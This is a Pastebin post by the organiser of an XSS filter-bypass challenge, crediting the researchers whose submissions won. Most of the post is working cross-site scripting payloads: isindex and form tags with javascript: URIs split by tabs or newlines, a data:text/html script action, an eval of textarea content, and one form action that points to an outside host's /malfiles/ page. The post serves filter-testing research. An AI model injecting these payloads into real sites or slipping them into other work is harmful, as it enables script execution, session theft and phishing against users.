Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Yesterday I have tweeted about the winner of XSS Challenge (http://demo.chm-software.com/xssfilter/) and down below you will find some more "awesome vectors submitted by different researchers" that got second, third position and so on ... The challenge is up and running and if you will find something new ... let me know (@soaj1664ashar). You will get something in the form of prize :-)
- 1st Position vector by a great person @avlidienbrunn and the vector is:
- -------------------------------------------------------
- <isindex action="javas	cript:alert(1)" type=image>
- and here is the example fiddle: http://jsfiddle.net/X7hdq/
- I have already tweeted about that here: https://twitter.com/soaj1664ashar/status/323847687755665409
- 2nd Position vectors submitted by an XSS Guru i.e., Mario (@0x6D6172696F).
- ---------------------------------------------------------------------
- In-fact Mario has sent me TWO vectors and they are:
- a) <form action='data:text/html,<script>alert(1)</script>'><button>CLICK
- here is the example fiddle for this: http://jsfiddle.net/6DTSp/
- b) <form action='java	scri	pt:alert(1)'><button>CLICK
- here is the working fiddle of this vector: http://jsfiddle.net/dPrHG/
- 3rd Position vector submitted by cool guy i.e., @secalert
- --------------------------------------------------------
- <form id="myform" value=""
- action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input
- type="submit" value="Absenden"></form>
- and here is the running fiddle: http://jsfiddle.net/HMH9k/
- and in `NO` particular order ... I have also received the following VALID vectors from awesome PWNERS :)
- ---------------------------------------------------------------------------------------------------------
- <isindex action=http://jkuskos.com/malfiles/jdk.html type=image> by @JohnathanKuskos
- <form action="	javas	cript	:alert('bypass :)')"
- autocomplete="on">
- First name:<input type="text" name="fname"><br>
- <input type="submit">
- </form> by @insertScript
- <form action=javascript
:alert(7)><input type=submit> by @Milad_Bahari
- <form action="javas	cript:alert(1)" method="get">
- <input type="submit" value="Submit">
- </form> by @_hlipinski
- FYI, I hope the above vectors will not work now .... :) #figureoutyourself
- At the same time ... I have also the biggest POOL of XSS vectors that people use here and there to break different filters. I will write in detail about that data in near future. This post is just to show the awesome vectors that are able to bypass the filter. I hope you guys have learn something and I have learnt a lot. I had also seen your "frustration" in the LOGS and it is really fun to watch logs :-). The challenge is online. Keep trying and figure out how you can break the filter.
- Stay Blessed!
- @soaj1664ashar
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement